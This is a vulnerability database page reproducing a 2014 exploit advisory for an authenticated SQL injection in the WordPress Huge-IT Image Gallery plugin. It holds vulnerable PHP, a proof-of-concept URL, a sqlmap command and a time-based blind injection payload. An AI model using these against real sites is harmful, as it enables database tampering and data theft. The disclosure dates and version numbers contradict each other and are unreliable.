Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Huge IT Image Gallery 1.0.0 SQL Injection

🗓️ 02 Sep 2014 00:00:00Reported by Claudio VivianiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection vulnerability, discovered by Claudio Viviani with a PoC video and sqlmap exploit cod

Code
`######################  
# Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection  
  
# Exploit Author : Claudio Viviani  
  
# Vendor Homepage : http://huge-it.com/  
  
# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip  
Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs  
  
# Date : 2014-08-25  
  
# Tested on : Windows 7 / Mozilla Firefox  
# Linux / Mozilla Firefox  
# Linux / sqlmap 1.0-dev-5b2ded0  
  
######################  
  
# Location :   
http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php  
  
######################  
  
# Vulnerable code :  
  
function editgallery($id)  
{  
  
global $wpdb;  
  
if(isset($_GET["removeslide"])){  
if($_GET["removeslide"] != ''){  
  
  
$wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_images WHERE id = ".$_GET["removeslide"]." ");  
  
  
  
}  
}  
  
######################  
  
# PoC Exploit:  
  
http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2  
  
  
# Exploit Code via sqlmap:  
  
sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \  
-p removeslide --dbms=mysql --level 3  
  
[20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable  
...  
...  
...  
---  
Place: GET  
Parameter: removeslide  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0 time-based blind - Parameter replace  
Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))  
---  
  
  
# PoC Video:  
  
https://www.youtube.com/watch?v=gAmb0_o3ZUc  
  
######################  
  
# Vulnerability Disclosure Timeline:  
  
2014-08-25: Discovered vulnerability  
2014-08-26: Vendor Notification (Web Customers Service Form)  
2014-08-26: No Response/Feedback   
2014-08-01: Plugin version 1.0.1 released without fix   
2014-08-02: Public Disclosure  
  
#####################  
  
Discovered By : Claudio Viviani  
http://www.homelab.it  
  
[email protected]  
[email protected]  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww  
  
#####################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Sep 2014 00:00Current
0.5Low risk
Vulners AI Score0.5
wordpresshuge-it image gallerysql injectionauthenticatedvulnerabilityclaudio vivianipoc videosqlmap exploit code
18